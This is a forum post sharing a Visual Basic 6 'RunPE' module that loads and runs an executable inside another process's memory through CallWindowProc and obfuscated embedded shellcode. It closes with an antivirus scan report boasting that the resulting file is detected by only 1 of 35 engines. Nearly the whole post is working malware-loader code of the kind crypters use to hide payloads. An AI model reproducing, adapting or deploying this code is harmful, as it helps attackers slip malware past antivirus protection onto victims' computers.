io.kent Posted January 24, 2013 Report Posted January 24, 2013 Option Explicit'---------------------------------------------------------------------------------------' Module : mshRunPE_Strings' Author : iCodeInVB6' Now : 05/16/2012 11:40' Purpose : Run executable in memory' Only uses CallWindowProc & shellcode' Credits : hamavb <-- made the shellcode!' Tested : Win7 x64' Mod by : Himanen'---------------------------------------------------------------------------------------'USER32Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As LongPrivate s_ASM(7) As StringPrivate b_ASM(1287) As BytePublic Sub RunPE(ByVal TargetHost As String, bBuffer() As Byte) Dim i As Long Dim j As Long Dim k As Long s_ASM(0) = "LM\60LM\E8LM\4ELM\00LM\00LM\00LM\6BLM\00LM\65LM\00LM\72LM\00LM\6ELM\00LM\65LM\00LM\6CLM\00LM\33LM\00LM\32LM\00LM\00LM\00LM\6ELM\00LM\74LM\00LM\64LM\00LM\6CLM\00LM\6CLM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\5BLM\8BLM\FCLM\6ALM\42LM\E8LM\BBLM\03LM\00LM\00LM\8BLM\54LM\24LM\28LM\89LM\11LM\8BLM\54LM\24LM\2CLM\6ALM\3ELM\E8LM\AALM\03LM\00LM\00LM\89LM\11LM\6ALM\4ALM\E8LM\A1LM\03LM\00LM\00LM\89LM\39LM\6ALM\1ELM\6ALM\3CLM\E8LM\9DLM\03LM\00LM\00LM\6ALM\22LM\68LM\F4LM\00LM\00LM\00LM\E8LM\91LM\03LM\00LM\00LM\6ALM\26LM\6ALM\24LM\E8LM\88LM\03LM\00LM\00LM\6ALM\2ALM\6ALM\40LM\E8LM\7FLM\03LM\00LM\00" s_ASM(1) = "LM\6ALM\2ELM\6ALM\0CLM\E8LM\76LM\03LM\00LM\00LM\6ALM\32LM\68LM\C8LM\00LM\00LM\00LM\E8LM\6ALM\03LM\00LM\00LM\6ALM\2ALM\E8LM\5CLM\03LM\00LM\00LM\8BLM\09LM\C7LM\01LM\44LM\00LM\00LM\00LM\6ALM\12LM\E8LM\4DLM\03LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\79LM\03LM\00LM\00LM\6ALM\3ELM\E8LM\3BLM\03LM\00LM\00LM\8BLM\D1LM\6ALM\1ELM\E8LM\32LM\03LM\00LM\00LM\6ALM\40LM\FFLM\32LM\FFLM\31LM\FFLM\D0LM\6ALM\12LM\E8LM\23LM\03LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\4FLM\03LM\00LM\00LM\6ALM\1ELM\E8LM\11LM\03LM\00LM\00LM\8BLM\09LM\8BLM\51LM\3CLM\6ALM\3ELM\E8LM\05LM\03LM\00LM\00LM\8BLM\39LM\03LM\FALM\6ALM\22LM\E8LM\FALM\02LM\00LM\00LM\8BLM\09LM\68LM\F8LM\00LM\00LM\00LM\57LM\51LM\FFLM\D0LM\6ALM\00LM\E8LM\E8LM\02LM\00LM\00LM\68LM\88LM\FELM\B3LM\16LM\51LM\E8LM\14LM\03LM\00LM\00LM\6ALM\2ELM\E8LM\D6LM\02LM\00" s_ASM(2) = "LM\00LM\8BLM\39LM\6ALM\2ALM\E8LM\CDLM\02LM\00LM\00LM\8BLM\11LM\6ALM\42LM\E8LM\C4LM\02LM\00LM\00LM\57LM\52LM\6ALM\00LM\6ALM\00LM\6ALM\04LM\6ALM\00LM\6ALM\00LM\6ALM\00LM\6ALM\00LM\FFLM\31LM\FFLM\D0LM\6ALM\12LM\E8LM\A9LM\02LM\00LM\00LM\68LM\D0LM\37LM\10LM\F2LM\51LM\E8LM\D5LM\02LM\00LM\00LM\6ALM\22LM\E8LM\97LM\02LM\00LM\00LM\8BLM\11LM\6ALM\2ELM\E8LM\8ELM\02LM\00LM\00LM\8BLM\09LM\FFLM\72LM\34LM\FFLM\31LM\FFLM\D0LM\6ALM\00LM\E8LM\7ELM\02LM\00LM\00LM\68LM\9CLM\95LM\1ALM\6ELM\51LM\E8LM\AALM\02LM\00LM\00LM\6ALM\22LM\E8LM\6CLM\02LM\00LM\00LM\8BLM\11LM\8BLM\39LM\6ALM\2ELM\E8LM\61LM\02LM\00LM\00LM\8BLM\09LM\6ALM\40LM\68LM\00LM\30LM\00LM\00LM\FFLM\72LM\50LM\FFLM\77LM\34LM\FFLM\31LM\FFLM\D0LM\6ALM\36LM\E8LM\47LM\02LM\00LM\00LM\8BLM\D1LM\6ALM\22LM\E8LM\3ELM\02LM\00LM\00LM\8BLM\39LM\6ALM\3ELM\E8LM\35LM\02LM\00" s_ASM(3) = "LM\00LM\8BLM\31LM\6ALM\22LM\E8LM\2CLM\02LM\00LM\00LM\8BLM\01LM\6ALM\2ELM\E8LM\23LM\02LM\00LM\00LM\8BLM\09LM\52LM\FFLM\77LM\54LM\56LM\FFLM\70LM\34LM\FFLM\31LM\6ALM\00LM\E8LM\10LM\02LM\00LM\00LM\68LM\A1LM\6ALM\3DLM\D8LM\51LM\E8LM\3CLM\02LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\12LM\E8LM\F9LM\01LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\25LM\02LM\00LM\00LM\6ALM\22LM\E8LM\E7LM\01LM\00LM\00LM\8BLM\11LM\83LM\C2LM\06LM\6ALM\3ALM\E8LM\DBLM\01LM\00LM\00LM\6ALM\02LM\52LM\51LM\FFLM\D0LM\6ALM\36LM\E8LM\CELM\01LM\00LM\00LM\C7LM\01LM\00LM\00LM\00LM\00LM\B8LM\28LM\00LM\00LM\00LM\6ALM\36LM\E8LM\BCLM\01LM\00LM\00LM\F7LM\21LM\6ALM\1ELM\E8LM\B3LM\01LM\00LM\00LM\8BLM\11LM\8BLM\52LM\3CLM\81LM\C2LM\F8LM\00LM\00LM\00LM\03LM\D0LM\6ALM\3ELM\E8LM\9FLM\01LM\00LM\00LM\03LM\11LM\6ALM\26LM\E8LM\96LM\01LM\00LM\00LM\6A" s_ASM(4) = "LM\28LM\52LM\FFLM\31LM\6ALM\12LM\E8LM\8ALM\01LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\B6LM\01LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\26LM\E8LM\73LM\01LM\00LM\00LM\8BLM\39LM\8BLM\09LM\8BLM\71LM\14LM\6ALM\3ELM\E8LM\65LM\01LM\00LM\00LM\03LM\31LM\6ALM\26LM\E8LM\5CLM\01LM\00LM\00LM\8BLM\09LM\8BLM\51LM\0CLM\6ALM\22LM\E8LM\50LM\01LM\00LM\00LM\8BLM\09LM\03LM\51LM\34LM\6ALM\46LM\E8LM\44LM\01LM\00LM\00LM\8BLM\C1LM\6ALM\2ELM\E8LM\3BLM\01LM\00LM\00LM\8BLM\09LM\50LM\FFLM\77LM\10LM\56LM\52LM\FFLM\31LM\6ALM\00LM\E8LM\2ALM\01LM\00LM\00LM\68LM\A1LM\6ALM\3DLM\D8LM\51LM\E8LM\56LM\01LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\36LM\E8LM\13LM\01LM\00LM\00LM\8BLM\11LM\83LM\C2LM\01LM\89LM\11LM\6ALM\3ALM\E8LM\05LM\01LM\00LM\00LM\8BLM\09LM\3BLM\CALM\0FLM\85LM\33LM\FFLM\FFLM\FFLM\6ALM\32LM\E8LM\F4LM\00LM\00LM\00" s_ASM(5) = "LM\8BLM\09LM\C7LM\01LM\07LM\00LM\01LM\00LM\6ALM\00LM\E8LM\E5LM\00LM\00LM\00LM\68LM\D2LM\C7LM\A7LM\68LM\51LM\E8LM\11LM\01LM\00LM\00LM\6ALM\32LM\E8LM\D3LM\00LM\00LM\00LM\8BLM\11LM\6ALM\2ELM\E8LM\CALM\00LM\00LM\00LM\8BLM\09LM\52LM\FFLM\71LM\04LM\FFLM\D0LM\6ALM\22LM\E8LM\BBLM\00LM\00LM\00LM\8BLM\39LM\83LM\C7LM\34LM\6ALM\32LM\E8LM\AFLM\00LM\00LM\00LM\8BLM\31LM\8BLM\B6LM\A4LM\00LM\00LM\00LM\83LM\C6LM\08LM\6ALM\2ELM\E8LM\9DLM\00LM\00LM\00LM\8BLM\11LM\6ALM\46LM\E8LM\94LM\00LM\00LM\00LM\51LM\6ALM\04LM\57LM\56LM\FFLM\32LM\6ALM\00LM\E8LM\86LM\00LM\00LM\00LM\68LM\A1LM\6ALM\3DLM\D8LM\51LM\E8LM\B2LM\00LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\22LM\E8LM\6FLM\00LM\00LM\00LM\8BLM\09LM\8BLM\51LM\28LM\03LM\51LM\34LM\6ALM\32LM\E8LM\60LM\00LM\00LM\00LM\8BLM\09LM\81LM\C1LM\B0LM\00LM\00LM\00LM\89LM\11LM\6ALM\00LM\E8" s_ASM(6) = "LM\4FLM\00LM\00LM\00LM\68LM\D3LM\C7LM\A7LM\E8LM\51LM\E8LM\7BLM\00LM\00LM\00LM\6ALM\32LM\E8LM\3DLM\00LM\00LM\00LM\8BLM\D1LM\6ALM\2ELM\E8LM\34LM\00LM\00LM\00LM\8BLM\09LM\FFLM\32LM\FFLM\71LM\04LM\FFLM\D0LM\6ALM\00LM\E8LM\24LM\00LM\00LM\00LM\68LM\88LM\3FLM\4ALM\9ELM\51LM\E8LM\50LM\00LM\00LM\00LM\6ALM\2ELM\E8LM\12LM\00LM\00LM\00LM\8BLM\09LM\FFLM\71LM\04LM\FFLM\D0LM\6ALM\4ALM\E8LM\04LM\00LM\00LM\00LM\8BLM\21LM\61LM\C3LM\8BLM\CBLM\03LM\4CLM\24LM\04LM\C3LM\6ALM\00LM\E8LM\F2LM\FFLM\FFLM\FFLM\68LM\54LM\CALM\AFLM\91LM\51LM\E8LM\1ELM\00LM\00LM\00LM\6ALM\40LM\68LM\00LM\10LM\00LM\00LM\FFLM\74LM\24LM\18LM\6ALM\00LM\FFLM\D0LM\FFLM\74LM\24LM\14LM\E8LM\CFLM\FFLM\FFLM\FFLM\89LM\01LM\83LM\C4LM\10LM\C3LM\E8LM\22LM\00LM\00LM\00LM\68LM\A4LM\4ELM\0ELM\ECLM\50LM\E8LM\4BLM\00LM\00LM\00LM\83LM\C4LM\08LM\FFLM\74LM\24LM\04" s_ASM(7) = "LM\FFLM\D0LM\FFLM\74LM\24LM\08LM\50LM\E8LM\38LM\00LM\00LM\00LM\83LM\C4LM\08LM\C3LM\55LM\52LM\51LM\53LM\56LM\57LM\33LM\C0LM\64LM\8BLM\70LM\30LM\8BLM\76LM\0CLM\8BLM\76LM\1CLM\8BLM\6ELM\08LM\8BLM\7ELM\20LM\8BLM\36LM\38LM\47LM\18LM\75LM\F3LM\80LM\3FLM\6BLM\74LM\07LM\80LM\3FLM\4BLM\74LM\02LM\EBLM\E7LM\8BLM\C5LM\5FLM\5ELM\5BLM\59LM\5ALM\5DLM\C3LM\55LM\52LM\51LM\53LM\56LM\57LM\8BLM\6CLM\24LM\1CLM\85LM\EDLM\74LM\43LM\8BLM\45LM\3CLM\8BLM\54LM\28LM\78LM\03LM\D5LM\8BLM\4ALM\18LM\8BLM\5ALM\20LM\03LM\DDLM\E3LM\30LM\49LM\8BLM\34LM\8BLM\03LM\F5LM\33LM\FFLM\33LM\C0LM\FCLM\ACLM\84LM\C0LM\74LM\07LM\C1LM\CFLM\0DLM\03LM\F8LM\EBLM\F4LM\3BLM\7CLM\24LM\20LM\75LM\E1LM\8BLM\5ALM\24LM\03LM\DDLM\66LM\8BLM\0CLM\4BLM\8BLM\5ALM\1CLM\03LM\DDLM\8BLM\04LM\8BLM\03LM\C5LM\5FLM\5ELM\5BLM\59LM\5ALM\5DLM\C3LM\C3LM\00LM\00LM\00LM\00" For i = 0 To 7 For j = 1 To 805 Step 5 b_ASM(k) = Replace(Mid(s_ASM(i), j, 5), "LM\", Chr(Val("38")) & Chr(Val("72"))): k = k + 1 Next j Next i CallWindowProcW VarPtr(b_ASM(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0End SubTipo de reporte: Analizar FicheroFecha/Hora: 24/01/2013 12:17:19 UTCFichero: sin.exeTamaño: 32768 KBMD5: 0952D1363A1E03F81166170962894CF6Detecciones:[COLOR="#FF0000"]1/35Estado: INFECTADO[/COLOR]AVG Free: LimpioArcaVir: LimpioAvast 5: Limpio[COLOR="#FF0000"]AntiVir (Avira): TR/Dropper.Gen[/COLOR]BitDefender: LimpioVirusBuster Internet Security: LimpioClam Antivirus: LimpioCOMODO Internet Security: LimpioDr.Web: LimpioeTrust-Vet: LimpioF-PROT Antivirus: LimpioF-Secure Internet Security: LimpioG Data: LimpioIKARUS Security: LimpioKaspersky Antivirus: LimpioMcAfee: LimpioMS Security Essentials: LimpioESET NOD32: LimpioNorman: LimpioNorton Antivirus: LimpioPanda Security: LimpioA-Squared: LimpioQuick Heal Antivirus: LimpioSolo Antivirus: LimpioSophos: LimpioTrend Micro Internet Security: LimpioVBA32 Antivirus: LimpioVexira Antivirus: LimpioZoner AntiVirus: LimpioAd-Aware: LimpioBullGuard: LimpioImmunet Antivirus: LimpioK7 Ultimate: LimpioNANO Antivirus: LimpioVIPRE: Limpio 1 Quote